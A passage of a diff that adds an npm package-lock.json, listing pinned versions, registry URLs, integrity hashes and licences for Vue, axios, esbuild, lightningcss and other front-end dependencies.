"sha512-fxVuX/fzgzeMPn/CLQecWeDIFNt3gQVhxM0rW02Tvp/YmZfXQgcTXlakq7IMutuZ/+Ogbn+K0oct9J3JZfyk3A==", + "license": "MIT", + "dependencies": { + "@vue/reactivity": "3.5.27", + "@vue/shared": "3.5.27" + } + }, + "node_modules/@vue/runtime-dom": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/runtime-dom/-/runtime-dom-3.5.27.tgz", + "integrity": "sha512-/QnLslQgYqSJ5aUmb5F0z0caZPGHRB8LEAQ1s81vHFM5CBfnun63rxhvE/scVb/j3TbBuoZwkJyiLCkBluMpeg==", + "license": "MIT", + "dependencies": { + "@vue/reactivity": "3.5.27", + "@vue/runtime-core": "3.5.27", + "@vue/shared": "3.5.27", + "csstype": "^3.2.3" + } + }, + "node_modules/@vue/server-renderer": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/server-renderer/-/server-renderer-3.5.27.tgz", + "integrity": "sha512-qOz/5thjeP1vAFc4+BY3Nr6wxyLhpeQgAE/8dDtKo6a6xdk+L4W46HDZgNmLOBUDEkFXV3G7pRiUqxjX0/2zWA==", + "license": "MIT", + "dependencies": { + "@vue/compiler-ssr": "3.5.27", + "@vue/shared": "3.5.27" + }, + "peerDependencies": { + "vue": "3.5.27" + } + }, + "node_modules/@vue/shared": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/shared/-/shared-3.5.27.tgz", + "integrity": "sha512-dXr/3CgqXsJkZ0n9F3I4elY8wM9jMJpP3pvRG52r6m0tu/MsAFIe6JpXVGeNMd/D9F4hQynWT8Rfuj0bdm9kFQ==", + "license": "MIT" + }, + "node_modules/acorn": { + "version": "8.15.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.15.0.tgz", + "integrity": "sha512-NZyJarBfL7nWwIq+FDL6Zp/yHEhePMNnnJ0y3qfieCrmNvYct8uvtiV41UvlSe6apAfk0fY1FbWx+NwfmpvtTg==", + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/ast-kit": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ast-kit/-/ast-kit-2.2.0.tgz", + "integrity": "sha512-m1Q/RaVOnTp9JxPX+F+Zn7IcLYMzM8kZofDImfsKZd8MbR+ikdOzTeztStWqfrqIxZnYWryyI9ePm3NGjnZgGw==", + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.28.5", + "pathe": "^2.0.3" + }, + "engines": { + "node": ">=20.19.0" + }, + "funding": { + "url": "https://github.com/sponsors/sxzz" + } + }, + "node_modules/ast-walker-scope": { + "version": "0.8.3", + "resolved": "https://registry.npmjs.org/ast-walker-scope/-/ast-walker-scope-0.8.3.tgz", + "integrity": "sha512-cbdCP0PGOBq0ASG+sjnKIoYkWMKhhz+F/h9pRexUdX2Hd38+WOlBkRKlqkGOSm0YQpcFMQBJeK4WspUAkwsEdg==", + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.28.4", + "ast-kit": "^2.1.3" + }, + "engines": { + "node": ">=20.19.0" + }, + "funding": { + "url": "https://github.com/sponsors/sxzz" + } + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", + "license": "MIT" + }, + "node_modules/autoprefixer": { + "version": "10.4.23", + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.23.tgz", + "integrity": "sha512-YYTXSFulfwytnjAPlw8QHncHJmlvFKtczb8InXaAx9Q0LbfDnfEYDE55omerIJKihhmU61Ft+cAOSzQVaBUmeA==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/autoprefixer" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "browserslist": "^4.28.1", + "caniuse-lite": "^1.0.30001760", + "fraction.js": "^5.3.4", + "picocolors": "^1.1.1", + "postcss-value-parser": "^4.2.0" + }, + "bin": { + "autoprefixer": "bin/autoprefixer" + }, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/axios": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.13.4.tgz", + "integrity": "sha512-1wVkUaAO6WyaYtCkcYCOx12ZgpGf9Zif+qXa4n+oYzK558YryKqiL6UWwd5DqiH3VRW0GYhTZQ/vlgJrCoNQlg==", + "license": "MIT", + "dependencies": { + "follow-redirects": "^1.15.6", + "form-data": "^4.0.4", + "proxy-from-env": "^1.1.0" + } + }, + "node_modules/baseline-browser-mapping": { + "version": "2.9.19", + "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.9.19.tgz", + "integrity": "sha512-ipDqC8FrAl/76p2SSWKSI+H9tFwm7vYqXQrItCuiVPt26Km0jS+NzSsBWAaBusvSbQcfJG+JitdMm+wZAgTYqg==", + "dev": true, + "license": "Apache-2.0", + "bin": { + "baseline-browser-mapping": "dist/cli.js" + } + }, + "node_modules/birpc": { + "version": "2.9.0", + "resolved": "https://registry.npmjs.org/birpc/-/birpc-2.9.0.tgz", + "integrity": "sha512-KrayHS5pBi69Xi9JmvoqrIgYGDkD6mcSe/i6YKi3w5kekCLzrX4+nawcXqrj2tIp50Kw/mT/s3p+GVK0A0sKxw==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/antfu" + } + }, + "node_modules/browserslist": { + "version": "4.28.1", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.28.1.tgz", + "integrity": "sha512-ZC5Bd0LgJXgwGqUknZY/vkUQ04r8NXnJZ3yYi4vDmSiZmC/pdSN0NbNRPxZpbtO4uAfDUAFffO8IZoM3Gj8IkA==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "baseline-browser-mapping": "^2.9.0", + "caniuse-lite": "^1.0.30001759", + "electron-to-chromium": "^1.5.263", + "node-releases": "^2.0.27", + "update-browserslist-db": "^1.2.0" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001766", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001766.tgz", + "integrity": "sha512-4C0lfJ0/YPjJQHagaE9x2Elb69CIqEPZeG0anQt9SIvIoOH4a4uaRl73IavyO+0qZh6MDLH//DrXThEYKHkmYA==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "CC-BY-4.0" + }, + "node_modules/chart.js": { + "version": "4.5.1", + "resolved": "https://registry.npmjs.org/chart.js/-/chart.js-4.5.1.tgz", + "integrity": "sha512-GIjfiT9dbmHRiYi6Nl2yFCq7kkwdkp1W/lp2J99rX0yo9tgJGn3lKQATztIjb5tVtevcBtIdICNWqlq5+E8/Pw==", + "license": "MIT", + "dependencies": { + "@kurkle/color": "^0.3.0" + }, + "engines": { + "pnpm": ">=8" + } + }, + "node_modules/chokidar": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-5.0.0.tgz", + "integrity": "sha512-TQMmc3w+5AxjpL8iIiwebF73dRDF4fBIieAqGn9RGCWaEVwQ6Fb2cGe31Yns0RRIzii5goJ1Y7xbMwo1TxMplw==", + "license": "MIT", + "dependencies": { + "readdirp": "^5.0.0" + }, + "engines": { + "node": ">= 20.19.0" + }, + "funding": { + "url": "https://paulmillr.com/funding/" + } + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "license": "MIT", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/confbox": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/confbox/-/confbox-0.2.2.tgz", + "integrity": "sha512-1NB+BKqhtNipMsov4xI/NnhCKp9XG9NamYp5PVm9klAT0fsrNPjaFICsCFhNhwZJKNh7zB/3q8qXz0E9oaMNtQ==", + "license": "MIT" + }, + "node_modules/copy-anything": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/copy-anything/-/copy-anything-4.0.5.tgz", + "integrity": "sha512-7Vv6asjS4gMOuILabD3l739tsaxFQmC+a7pLZm02zyvs8p977bL3zEgq3yDk5rn9B0PbYgIv++jmHcuUab4RhA==", + "license": "MIT", + "dependencies": { + "is-what": "^5.2.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/mesqueeb" + } + }, + "node_modules/csstype": { + "version": "3.2.3", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz", + "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==", + "license": "MIT" + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "license": "MIT", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/detect-libc": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz", + "integrity": "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==", + "license": "Apache-2.0", + "engines": { + "node": ">=8" + } + }, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/electron-to-chromium": { + "version": "1.5.282", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.282.tgz", + "integrity": "sha512-FCPkJtpst28UmFzd903iU7PdeVTfY0KAeJy+Lk0GLZRwgwYHn/irRcaCbQQOmr5Vytc/7rcavsYLvTM8RiHYhQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/enhanced-resolve": { + "version": "5.18.4", + "resolved": "https://registry.npmjs.org/enhanced-resolve/-/enhanced-resolve-5.18.4.tgz", + "integrity": "sha512-LgQMM4WXU3QI+SYgEc2liRgznaD5ojbmY3sb8LxyguVkIg5FxdpTkvk72te2R38/TGKxH634oLxXRGY6d7AP+Q==", + "license": "MIT", + "dependencies": { + "graceful-fs": "^4.2.4", + "tapable": "^2.2.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/entities": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/entities/-/entities-7.0.1.tgz", + "integrity": "sha512-TWrgLOFUQTH994YUyl1yT4uyavY5nNB5muff+RtWaqNVCAK408b5ZnnbNAUEWLTCpum9w6arT70i1XdQ4UeOPA==", + "license": "BSD-2-Clause", + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/esbuild": { + "version": "0.27.2", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.27.2.tgz", + "integrity": "sha512-HyNQImnsOC7X9PMNaCIeAm4ISCQXs5a5YasTXVliKv4uuBo1dKrG0A+uQS8M5eXjVMnLg3WgXaKvprHlFJQffw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.27.2", + "@esbuild/android-arm": "0.27.2", + "@esbuild/android-arm64": "0.27.2", + "@esbuild/android-x64": "0.27.2", + "@esbuild/darwin-arm64": "0.27.2", + "@esbuild/darwin-x64": "0.27.2", + "@esbuild/freebsd-arm64": "0.27.2", + "@esbuild/freebsd-x64": "0.27.2", + "@esbuild/linux-arm": "0.27.2", + "@esbuild/linux-arm64": "0.27.2", + "@esbuild/linux-ia32": "0.27.2", + "@esbuild/linux-loong64": "0.27.2", + "@esbuild/linux-mips64el": "0.27.2", + "@esbuild/linux-ppc64": "0.27.2", + "@esbuild/linux-riscv64": "0.27.2", + "@esbuild/linux-s390x": "0.27.2", + "@esbuild/linux-x64": "0.27.2", + "@esbuild/netbsd-arm64": "0.27.2", + "@esbuild/netbsd-x64": "0.27.2", + "@esbuild/openbsd-arm64": "0.27.2", + "@esbuild/openbsd-x64": "0.27.2", + "@esbuild/openharmony-arm64": "0.27.2", + "@esbuild/sunos-x64": "0.27.2", + "@esbuild/win32-arm64": "0.27.2", + "@esbuild/win32-ia32": "0.27.2", + "@esbuild/win32-x64": "0.27.2" + } + }, + "node_modules/escalade": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/estree-walker": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-2.0.2.tgz", + "integrity": "sha512-Rfkk/Mp/DL7JVje3u18FxFujQlTNR2q6QfMSMB7AvCBx91NGj/ba3kCfza0f6dVDbw7YlRf/nDrn7pQrCCyQ/w==", + "license": "MIT" + }, + "node_modules/exsolve": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/exsolve/-/exsolve-1.0.8.tgz", + "integrity": "sha512-LmDxfWXwcTArk8fUEnOfSZpHOJ6zOMUJKOtFLFqJLoKJetuQG874Uc7/Kki7zFLzYybmZhp1M7+98pfMqeX8yA==", + "license": "MIT" + }, + "node_modules/fdir": { + "version": "6.5.0", + "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz", + "integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==", + "license": "MIT", + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "picomatch": "^3 || ^4" + }, + "peerDependenciesMeta": { + "picomatch": { + "optional": true + } + } + }, + "node_modules/follow-redirects": { + "version": "1.15.11", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.11.tgz", + "integrity": "sha512-deG2P0JfjrTxl50XGCDyfI97ZGVCxIpfKYmfyrQ54n5FO/0gfIES8C/Psl6kWVDolizcaaxZJnTS0QSMxvnsBQ==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/RubenVerborgh" + } + ], + "license": "MIT", + "engines": { + "node": ">=4.0" + }, + "peerDependenciesMeta": { + "debug": { + "optional": true + } + } + }, + "node_modules/form-data": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", + "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", + "license": "MIT", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/fraction.js": { + "version": "5.3.4", + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz", + "integrity": "sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": "*" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/rawify" + } + }, + "node_modules/fsevents": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", + "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "license": "ISC" + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/hookable": { + "version": "5.5.3", + "resolved": "https://registry.npmjs.org/hookable/-/hookable-5.5.3.tgz", + "integrity": "sha512-Yc+BQe8SvoXH1643Qez1zqLRmbA5rCL+sSmk6TVos0LWVfNIB7PGncdlId77WzLGSIB5KaWgTaNTs2lNVEI6VQ==", + "license": "MIT" + }, + "node_modules/is-what": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/is-what/-/is-what-5.5.0.tgz", + "integrity": "sha512-oG7cgbmg5kLYae2N5IVd3jm2s+vldjxJzK1pcu9LfpGuQ93MQSzo0okvRna+7y5ifrD+20FE8FvjusyGaz14fw==", + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/mesqueeb" + } + }, + "node_modules/jiti": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/jiti/-/jiti-2.6.1.tgz", + "integrity": "sha512-ekilCSN1jwRvIbgeg/57YFh8qQDNbwDb9xT/qu2DAHbFFZUicIl4ygVaAvzveMhMVr3LnpSKTNnwt8PoOfmKhQ==", + "license": "MIT", + "bin": { + "jiti": "lib/jiti-cli.mjs" + } + }, + "node_modules/jsesc": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.1.0.tgz", + "integrity": "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==", + "license": "MIT", + "bin": { + "jsesc": "bin/jsesc" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/json5": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "license": "MIT", + "bin": { + "json5": "lib/cli.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/lightningcss": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss/-/lightningcss-1.30.2.tgz", + "integrity": "sha512-utfs7Pr5uJyyvDETitgsaqSyjCb2qNRAtuqUeWIAKztsOYdcACf2KtARYXg2pSvhkt+9NfoaNY7fxjl6nuMjIQ==", + "license": "MPL-2.0", + "dependencies": { + "detect-libc": "^2.0.3" + }, + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + }, + "optionalDependencies": { + "lightningcss-android-arm64": "1.30.2", + "lightningcss-darwin-arm64": "1.30.2", + "lightningcss-darwin-x64": "1.30.2", + "lightningcss-freebsd-x64": "1.30.2", + "lightningcss-linux-arm-gnueabihf": "1.30.2", + "lightningcss-linux-arm64-gnu": "1.30.2", + "lightningcss-linux-arm64-musl": "1.30.2", + "lightningcss-linux-x64-gnu": "1.30.2", + "lightningcss-linux-x64-musl": "1.30.2", + "lightningcss-win32-arm64-msvc": "1.30.2", + "lightningcss-win32-x64-msvc": "1.30.2" + } + }, + "node_modules/lightningcss-android-arm64": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-android-arm64/-/lightningcss-android-arm64-1.30.2.tgz", + "integrity": "sha512-BH9sEdOCahSgmkVhBLeU7Hc9DWeZ1Eb6wNS6Da8igvUwAe0sqROHddIlvU06q3WyXVEOYDZ6ykBZQnjTbmo4+A==", + "cpu": [ + "arm64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-darwin-arm64": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-darwin-arm64/-/lightningcss-darwin-arm64-1.30.2.tgz", + "integrity": "sha512-ylTcDJBN3Hp21TdhRT5zBOIi73P6/W0qwvlFEk22fkdXchtNTOU4Qc37SkzV+EKYxLouZ6M4LG9NfZ1qkhhBWA==", + "cpu": [ + "arm64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-darwin-x64": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-darwin-x64/-/lightningcss-darwin-x64-1.30.2.tgz", + "integrity": "sha512-oBZgKchomuDYxr7ilwLcyms6BCyLn0z8J0+ZZmfpjwg9fRVZIR5/GMXd7r9RH94iDhld3UmSjBM6nXWM2TfZTQ==", + "cpu": [ + "x64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-freebsd-x64": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-freebsd-x64/-/lightningcss-freebsd-x64-1.30.2.tgz", + "integrity": "sha512-c2bH6xTrf4BDpK8MoGG4Bd6zAMZDAXS569UxCAGcA7IKbHNMlhGQ89eRmvpIUGfKWNVdbhSbkQaWhEoMGmGslA==", + "cpu": [ + "x64" + ], + "license": "MPL-2.0", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm-gnueabihf": { + "version": "1.30.2", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm-gnueabihf/-/lightningcss-linux-arm-gnueabihf-1.30.2.tgz", + "integrity": "sha512-eVdpxh4wYcm0PofJIZVuYuLiqBIakQ9uFZmipf6LF/HRj5Bgm0eb3qL/mr1smyXIS1twwOxNWndd8z0E374hiA==", + "cpu": [ + 